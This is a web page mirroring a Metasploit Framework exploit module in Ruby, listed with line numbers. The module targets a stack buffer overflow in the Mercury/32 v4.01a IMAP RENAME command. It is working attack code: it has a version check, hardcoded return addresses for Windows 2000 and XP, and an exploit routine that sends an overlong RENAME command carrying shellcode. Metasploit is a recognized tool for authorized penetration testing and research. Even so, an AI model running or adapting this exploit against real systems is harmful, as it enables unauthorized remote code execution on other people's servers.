Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/mercury_rename.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Imap

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow vulnerability in the

18
          Mercury/32 v.4.01a IMAP service.

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2004-1211'],

24
          [ 'OSVDB', '12508'],

25
          [ 'BID', '11775'],

26
          [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=15867'],

27
        ],

28
        'Privileged' => true,

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Payload' => {

33
          'Space' => 500,

34
          'BadChars' => "\x00\x0a\x0d\x20",

35
          'StackAdjustment' => -3500,

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          ['Windows 2000 SP4 English', { 'Ret' => 0x7846107b }],

40
          ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],

41
          ['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],

42
        ],

43
        'DisclosureDate' => '2004-11-29',

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51
  end

52


53
  def check

54
    connect

55
    resp = sock.get_once

56
    disconnect

57


58
    if (resp =~ /Mercury\/32 v4\.01a/)

59
      return Exploit::CheckCode::Appears

60
    end

61


62
    return Exploit::CheckCode::Safe

63
  end

64


65
  def exploit

66
    connect_login

67


68
    sploit = "a001 RENAME " + rand_text_alpha_upper(260)

69
    sploit << [target.ret].pack('V') + payload.encoded

70


71
    sock.put(sploit)

72


73
    handler

74
    disconnect

75
  end

76
end

77


78